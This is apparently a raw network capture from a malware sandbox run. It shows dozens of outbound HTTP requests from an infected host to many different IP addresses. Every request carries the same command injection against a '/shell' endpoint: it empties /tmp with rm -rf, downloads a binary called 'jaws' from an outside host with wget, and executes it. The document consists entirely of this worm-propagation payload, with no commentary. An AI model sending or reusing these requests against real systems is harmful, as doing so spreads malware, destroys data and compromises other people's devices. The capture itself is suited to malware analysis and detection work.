                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            391192.168.2.1347840122.194.52.3180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.113559008 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            392192.168.2.1359022145.29.230.14080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.114191055 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            393192.168.2.135239276.129.22.580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.114753962 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            394192.168.2.1357908208.224.88.16480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.115391016 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            395192.168.2.133724290.50.216.3380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.116833925 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            396192.168.2.1340336142.74.226.6580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.118011951 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            397192.168.2.1341168221.178.28.10580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.118707895 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            398192.168.2.1335946153.10.225.11380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.119333029 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            399192.168.2.133865278.106.130.580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.119966030 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            400192.168.2.135498689.231.127.8280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.120500088 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            401192.168.2.133421296.74.255.25280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.121056080 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            402192.168.2.1351760135.204.76.2680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.121618986 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            403192.168.2.136088831.54.174.17280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.122172117 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            404192.168.2.134704472.90.29.5580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.122706890 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            405192.168.2.134036075.224.59.16580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.123264074 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            406192.168.2.1346196209.207.220.11580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.123851061 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            407192.168.2.1346494212.223.13.13580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.125008106 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            408192.168.2.1333280106.120.14.25180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.125560999 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            409192.168.2.1341096218.60.33.20080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.126147032 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            410192.168.2.1343072148.32.33.9180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.126714945 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            411192.168.2.1336034179.134.3.4080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.127507925 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            412192.168.2.1337282193.181.62.25280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.128087044 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            413192.168.2.1344504190.161.182.14280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.128990889 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            414192.168.2.1339360107.49.182.12580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.129599094 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            415192.168.2.134992648.89.208.880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.130177021 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            416192.168.2.1338916211.255.132.13580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.130779028 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            417192.168.2.1342740212.194.156.23980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.131521940 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            418192.168.2.133760848.136.166.23380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.132169008 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            419192.168.2.134550492.13.170.5180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.132767916 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            420192.168.2.135034843.251.181.1080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.133347988 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            421192.168.2.1341286220.61.58.14580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.134116888 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            422192.168.2.1339618179.209.203.12480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.134607077 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            423192.168.2.1356392103.245.19.8180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.135366917 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            424192.168.2.1345424117.64.201.4880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.135826111 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            425192.168.2.1336728162.38.247.4080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.136394978 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            426192.168.2.13595465.5.59.13580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.137029886 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            427192.168.2.135706493.149.221.23780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.137618065 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            428192.168.2.1339472180.138.26.22880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.138190031 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            429192.168.2.1339426104.230.30.20080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.138777971 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            430192.168.2.1335604119.69.66.11180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.139383078 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            431192.168.2.1351556130.57.240.14280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.139987946 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            432192.168.2.1349986110.111.139.880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.140609980 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            433192.168.2.134357437.115.220.9680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.142395020 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            434192.168.2.134845824.64.193.4680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.143166065 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            435192.168.2.1350320121.144.172.15480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.143760920 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            436192.168.2.1348144124.6.22.15280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.144368887 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            437192.168.2.1335910106.7.166.12680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.145052910 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            438192.168.2.133399499.191.18.12680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.145724058 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            439192.168.2.133640072.99.239.2680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.146534920 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            440192.168.2.1333116117.189.134.2880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.147216082 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            441192.168.2.1358770118.254.40.20880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.147809982 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            442192.168.2.1353442115.50.164.9080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.148490906 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            443192.168.2.13586342.133.83.16380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.149120092 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            444192.168.2.1341308186.226.52.8880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.149724007 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            445192.168.2.1356144124.126.246.19780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.150336027 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            446192.168.2.1342214105.229.187.23780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.150980949 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            447192.168.2.134256661.33.199.23080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.151592016 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            448192.168.2.1348888175.66.114.18280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.152273893 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            449192.168.2.1342924120.43.7.22880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.153496981 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            450192.168.2.135187065.168.33.5780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.154887915 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            451192.168.2.1348748107.68.239.14980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.155523062 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            452192.168.2.133527219.229.67.7480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.156095028 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


